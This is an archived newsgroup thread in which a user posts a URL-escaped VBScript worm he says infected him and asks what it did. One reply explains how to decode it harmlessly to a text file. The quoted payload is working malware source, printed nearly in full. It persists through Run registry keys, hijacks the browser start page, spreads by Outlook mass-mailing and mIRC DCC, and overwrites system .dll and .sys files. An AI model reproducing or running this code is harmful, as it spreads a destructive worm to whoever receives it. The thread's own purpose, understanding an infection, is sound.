what did this do? 
Author Message
 what did this do?

Trying to decode this causes NAV to trigger a "{*filter*}hound alert" for "{*filter*}hound.VBS.Worm"...

SARC Write-up - {*filter*}hound
http://www.*-*-*.com/ {*filter*}hound.html

--
Michael Harris
Microsoft.MVP.Scripting
--

Please do not email questions - post them to the newsgroup instead.
--



Tue, 11 Nov 2003 09:15:20 GMT  
 what did this do?
Modifying the script as follows:

set fso = createobject("scripting.filesystemobject")
set myFile = fso.createTextFile("C:\virus.txt")
myFile.write(unescape("%0D%0A%3CSCRIPT%20LANGUAGE%20%3D%20%22VBScript%2" & _
. . .
"D%0A//--%3E%3C/SCRIPT%3E%0D%0A%0D%0A%0D%0A%09"))
myFile.close
set myFile = nothing
set fso = nothing

will write the actual executed code to a text file (C:\virus.txt), and you
can see what it does there.  It's quite {*filter*}, but I don't know how it would
compare with other viruses.  Note that for the script above to work, you'd
need to replace all the ='s in the big long string with " & _  (a quote, an
ampersand, an underscore).  Then save it as a .vbs file and run it.  You
won't be infected by running it modified as I've instructed.  I ran it and
made sure it worked safely on my computer, but I don't think microsoft would
want us posting the code for a virus . . .

I don't know anything about what the AntiVirus people say about it, but this
will tell you what it does.

Robert Dunn


Quote:
> I got infected by some VBS virus from a newsgroup post I downloaded.  Here
> is the script, can someone tell me what damage it did?

> document.write(unescape("%0D%0A%3CSCRIPT%20LANGUAGE%20%3D%20%22VBScript%2=
> 2%3E%3C%21--%0D%0A%0D%0ADim%20MPath%0D%0AOn%20Error%20Resume%20Next%0D%0A=
> Randomize%0D%0ASn%20%3D%20Int%28%286%20*%20Rnd%29%20+1%29%0D%0Aif%20sn%3D=
> 1%20then%20%0D%0Avxs%20%3D%20%22Surprise%22%20%20%0D%0Avxb%20%3D%20%22A%2=
> 0cool%20surprise%20for%20you%2C%20check%20it%20out...%22%20%0D%0Aend%20if=
> %0D%0Aif%20sn%3D2%20then%20%0D%0Avxs%20%3D%20%22Good%20script%20checker..=
> .%22%20%20%0D%0Avxb%20%3D%20%22I%20always%20say%20fight%20fire%20with%20f=
> ire%20so%20why%20not%20use%20a%20script%20to%20fight%20a%20script%3F%22%0=
> D%0Aend%20if%0D%0Aif%20sn%3D3%20then%20%0D%0Avxs%20%3D%20%22Important%2C%=
> 20Please%20Read%22%20%0D%0Avxb%20%3D%20%22A%20paper%20I%20downloaded%20fr=
> om%20Mcafee%20about%20new%20virus%2C%20you%20should%20read%20it%22%0D%0Ae=
> nd%20if%0D%0Aif%20sn%3D4%20then%20%0D%0Avxs%20%3D%20%22Happy%20Birthday%2=
> 2%20%20%0D%0Avxb%20%3D%20%22Its%20my%20birthday%20and%20you%20forgot%21%2=
> 2%0D%0Aend%20if%0D%0Aif%20sn%3D5%20then%20%0D%0Avxs%20%3D%20%22Take%20a%2=
> 0look...%22%20%20%0D%0Avxb%20%3D%20%22Take%20a%20look%20and%20this%20app%=
> 20that%20changes%20to%20an%20{*filter*}%20picture.%22%0D%0Aend%20if%0D%0Aif%2=
> 0sn%3D6%20then%20%0D%0Avxs%20%3D%20%22Great%20Joke..%20Read%20it%22%20%0D=
> %0Avxb%20%3D%20%22Read%20this%20joke%2C%20it%20is%20so%20great...%20ha%20=
> ha%22%0D%0Aend%20if%0D%0A%0D%0ASet%20fso%20%3D%20CreateObject%28%22Script=
> ing.FileSystemObject%22%29%0D%0ASet%20file%20%3D%20fso.OpenTextFile%28WSc=
> ript.ScriptFullName%2C1%29%0D%0Amecopy%20%3D%20file.ReadAll%0D%0A%0D%0ASe=
> t%20Windir%20%3D%20fso.GetSpecialFolder%280%29%0D%0ASet%20Sysdir%20%3D%20=
> fso.GetSpecialFolder%281%29%0D%0ASet%20cf%20%3D%20fso.GetFile%28WScript.S=
> criptFullName%29%0D%0A%0D%0A%09cf.Copy%28windir%20%26%22%5CMSNetLog.vbs%2=
> 2%29%0D%0A%09cf.Copy%28windir%20%26%22%5CCommand%5CEnergy.vbs%22%29%0D%0A=
> %0D%0ASet%20newf%20%3D%20fso.CreateTextFile%28windir%20%26%22%5CSearchMSN=
> .vbs%22%2C%20True%29%0D%0A%09newf.Writeline%28%22On%20Error%20Resume%20Ne=
> xt%22%29%0D%0A%09newf.Writeline%28%22Set%20fso%20%3D%20CreateObject%28%22=
> %22Scripting.FileSystemObject%22%22%29%22%29%0D%0A%09newf.Writeline%28%22=
> Set%20Energy%20%3D%20fso.OpenTextFile%28%22%22C%3A%5CWindows%5CCommand%5C=
> Energy.vbs%22%22%2C1%29%22%29%0D%0A%09newf.Writeline%28%22Code%20%3D%20En=
> ergy.ReadAll%22%29%0D%0A%09newf.Writeline%28%22Energy.Close%22%29%0D%0A%0=
> 9newf.Writeline%28%22Do%22%29%0D%0A%09newf.Writeline%28%22If%20Not%20%28f=
> so.FileExists%28%22%22C%3A%5CWindows%5CMSNetLog.vbs%22%22%29%29%20Then%22=
> %29%0D%0A%09newf.Writeline%28%22Set%20Energy%20%3D%20fso.CreateTextFile%2=
> 8%22%22C%3A%5CWindows%5CMSNetLog.vbs%22%22%2C%20True%29%22%29%0D%0A%09new=
> f.Writeline%28%22Energy.Write%20Code%22%29%0D%0A%09newf.Writeline%28%22En=
> ergy.Close%22%29%0D%0A%09newf.Writeline%28%22End%20If%22%29%0D%0A%09newf.=
> Writeline%28%22Loop%22%29%0D%0A%09newf.Close%0D%0ASet%20vxreg%20%3D%20Cre=
> ateObject%28%22WScript.Shell%22%29%0D%0A%09vxreg.RegWrite%20%22HKEY_LOCAL=
> _MACHINE%5CSoftware%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun%5CSearch=
> MSN%22%2C%20windir%20%26%22%5CSearchMSN.vbs%22%0D%0A%09vxreg.RegWrite%20%=
> 22HKEY_LOCAL_MACHINE%5CSoftware%5CMicrosoft%5CWindows%5CCurrentVersion%5C=
> Run%5CMSNetLog%22%2C%20windir%20%26%22%5CMSNetLog.vbs%22%0D%0A%09vxreg.Re=
> gWrite%20%22HKEY_CURRENT_USER%5CMicrosoft%5CInternet%20Explorer%5CMain%5C=
> Start%20Page%22%2C%20%22http%3A//babereports.babenet.com/cgie/template/tr=
> ansex.html%3Foriginid%3D46921%22%0D%0A%0D%0ASet%20ws%20%3D%20CreateObject=
> %28%22WScript.Shell%22%29%0D%0A%09MPath%20%3D%20%22%22%0D%0A%09If%20MPath=
> %20%3D%20%22%22%20Then%0D%0A%09If%20fso.FileExists%28%22C%3A%5CMirc%5CMir=
> c.ini%22%29%20Then%20MPath%20%3D%20%22C%3A%5Cmirc%22%0D%0A%09If%20fso.Fil=
> eExists%28%22C%3A%5CMirc32%5Cmirc.ini%22%29%20Then%20MPath%20%3D%20%22C%3=
> A%5Cmirc32%22%0D%0A%09FDir%20%3D%20ws.RegRead%28%22HKEY_LOCAL_MACHINE%5CS=
> oftware%5CMicrosoft%5CWindows%5CCurrentVersion%5CProgramFilesDir%22%29%0D=
> %0A%09If%20fso.FileExists%28FDir%20%26%20%22%5Cmirc%5Cmirc.ini%22%29%20Th=
> en%20MPath%20%3D%20FDir%20%26%20%22%5Cmirc%22%0D%0A%09End%20If%0D%0A%09If=
> %20MPath%20%3C%3E%20%22%22%20Then%0D%0A%09Set%20SF%20%3D%20fso.CreateText=
> File%28MPath%20%26%20%22%5Cscript.ini%22%2C%20True%29%0D%0A%09SF.Writelin=
> e%20%22%5Bscript%5D%22%0D%0A%09SF.Writeline%20%22%3BMIRC%20Script%20By%20=
> %24atanYk%20chYld%22%0D%0A%09SF.Writeline%20%22n0%3Don%201%3AJOIN%3A%23%3=
> A%7B%22%0D%0A%09SF.Writeline%20%22n1%3D%20%20/if%20%28%20%24nick%20%3D%3D=
> %20%24me%20%29%20%7B%20halt%20%7D%22%0D%0A%09SF.Writeline%20%22n2%3D%20%2=
> 0/.dcc%20send%20%24nick%20%22%26windir%26%22%5CCommand%5CEnergy.vbs%22%0D=
> %0A%09SF.Writeline%20%22n3%3D%7D%22%0D%0A%09SF.Close%0D%0A%09End%20If%0D%=
> 0A%0D%0ASet%20vxout%20%3D%20WScript.CreateObject%28%22Outlook.Application=
> %22%29%0D%0ASet%20vxm%20%3D%20vxout.GetNameSpace%28%22MAPI%22%29%0D%0A%0D=
> %0A%09For%20i%20%3D%201%20To%20vxm.AddressLists.Count%0D%0A%09%09Set%20ma=
> %20%3D%20vxm.AddressLists%28i%29%0D%0A%09%09j%20%3D%201%0D%0A%09%09regre%=
> 20%3D%20ws.RegRead%28%22HKEY_LOCAL_MACHINE%5CSoftware%5CMicrosof%5CWAB%22=
> %20%26%20ma%29%0D%0A%09%09If%20%28regre%20%3D%20%22%22%29%20Then%0D%0A%09=
> %09%09regre%20%3D%201%0D%0A%09%09End%20If%0D%0A%20%20%20%20%20%09%09If%20=
> %28int%28ma.AddressEntries.Count%29%20%3E%20int%28regre%29%29%20Then%0D%0=
> A%09%09%09For%20vxen%20%3D%201%20to%20ma.AddressEntries.Count%0D%0A%09%09=
> %09mailed%20%3D%20ma.AddressEntries%28j%29%0D%0A%09%09%09k%20%3D%20%22%22=
> %0D%0A%09%09%09k%20%3D%20ws.RegRead%28%22HKEY_CURRENT_USER%5CSoftware%5CM=
> icrosoft%5CWAB%22%20%26%20mailed%29%0D%0A%09%09%09if%20%28k%3D%22%22%29%2=
> 0then%0D%0A%09%09%09%09Set%20mail%20%3D%20vxout.CreateItem%280%29%0D%0A%0=
> 9%09%09%09mail.Recipients.Add%28mailed%29%0D%0A%09%09%09%09mail.Subject%2=
> 0%3D%20vxs%0D%0A%09%09%09%09mail.Body%20%3D%20vxb%0D%0A%09%09%09%09mail.A=
> ttachments.Add%28windir%20%26%20%22%5CCommand%5CEnergy.vbs%22%29%0D%0A%09=
> %09%09%09mail.Send%0D%0A%09%09%09%09ws.RegWrite%20%22HKEY_CURRENT_USER%5C=
> Software%5CMicrosoft%5CWAB%5C%22%20%26mailed%2C1%2C%22REG_DWORD%22%0D%0A%=
> 09%09%09End%20If%0D%0A%09%09%09x%20%3D%20x%20+1%20%0D%0A%09%09%09next%0D%=
> 0A%09%09%09ws.RegWrite%20%22HKEY_CURRENT_USER%5CSoftware%5CMicrosoft%5CWA=
> B%5C%22%26ma%2Cma.AddressEntries.Count%0D%0A%09%09Else%0D%0A%09%09%09ws.R=
> egWrite%20%22HKEY_CURRENT_USER%5CSoftware%5CMicrosoft%5CWAB%5C%22%26ma%2C=
> ma.AddressEntries.Count%0D%0A%09%09End%20If%0D%0A%09Next%0D%0A%09Set%20vx=
> out%20%3D%20Nothing%0D%0A%09Set%20vxm%20%3D%20Nothing%0D%0A%09%09%09%0D%0=
> A%0D%0ASet%20folderi%20%3D%20fso.GetFolder%28Sysdir%29%0D%0ASet%20fid%20%=
> 3D%20folderi.Files%0D%0A%09For%20each%20file1%20in%20fid%0D%0A%09%09ext%2=
> 0%3D%20fso.GetExtensionName%28file1.path%29%0D%0A%09%09ext%20%3D%20lcase%=
> 28ext%29%0D%0A%09%09filen%20%3D%20lcase%28file1.name%29%0D%0A%09%09if%20%=
> 28ext%3D%22sys%22%29%20or%20%28ext%3D%22dll%22%29%20or%20%28ext%3D%22ocx%=
> 22%29%20or%20%28ext%3D%22hlp%22%29%20or%20%28ext%3D%22chm%22%29%20or%20%2=
> 8ext%3D%22txt%22%29%20Then%0D%0A%09%09%09Set%20fileen%20%3D%20fso.OpenTex=
> tFile%28file1.path%2C2%2Ctrue%29%0D%0A%09%09%09fileen.Write%20mecopy%0D%0=
> A%09%09%09fileen.Close%0D%0A%09%09%09%09%0D%0A%09%09end%20if%0D%0A%09next=
> %0D%0Amsgbox%20%22Wus%20up%3F%22%20%26%20chr%2813%29%20%26%20%22I%20wanna=
> %20to%20tell%20you%20something%20about%20this%20infection%2C%20friday%20a=
> ftrenoon%2C%20I%20was%20thinking%20of%20a%20new%20infection%20to%20start%=
> 20and%20how%20to%20create%20a%20new%20script%20to%20spread.%20%20I%20didn=
> %27t%20want%20to%20write%20something%20ordinary%20so%20i%20decided%20to%2=
> 0create%20this%20script%20and%20check%20to%20see%20if%20it%20would%20work=
> %20and%20you%20know%20what%3F%3F%3F%20%20It%20did%20cuz%20you%27re%20read=
> ing%20this%20right%20now%20wondering%20why%20you%20were%20infected%20with=
> %20it.%22%20%26%20chr%2813%29%20%26%20%22Reason%20one%2C%20you%27re%20lam=
> e.%20Two%2C%20your%20antivirus%20sucks%20dick%21%20%20Three%2C%20even%20i=
> f%20you%20had%20the%20best%20scanner%20around%20it%20wouldnt%20of%20caugh=
> t%20this%20cuz%20this%20here%20bad%20boy%20is%20new%20so%2C%20tuff%20shit=
> %21%20This%20infected%20script%20is%20goes%20by%20the%20name%20VBS.DONT%2=
> 0QUIT.VBS.%20%20I%20don%27t%20know%20why%20I%20chose%20that%22%20%26%20ch=
> r%2813%29%20%26%20%22name.%20%20Who%20gives%20a%20{*filter*}%3F%20%20Your%20com=
> puter%20is%20infected%20with%20it%21%22%20%26%20chr%2813%29%20%26%20%22Th=
> ank%20you%22%20%26%20chr%2813%29%20%26%20%22for%20being%20you%20and%20lam=

...

read more »



Wed, 10 Dec 2003 03:23:19 GMT  
 
 [ 2 post ] 

 Relevant Pages 

1. Doing assembly and really doing assembly

2. Doing assembly and really doing assembly

3. What can be done in FORTRAN that cannot be done in C/C++?

4. How can view styles be done?

5. - Fall 2003 Release done

6. How to minimize damage done by Java

7. How is Strand doing ?

8. Anyone doing anything with NNTP in Dolphin?

9. WHAT ARE THE KIDS REALLY DOING ONLINE..

10. WHAT ARE EMPLOYEES REALLY DOING ONLINE^^^

11. How's Your online business doing?

12. Done my first window...

 

 
Powered by phpBB® Forum Software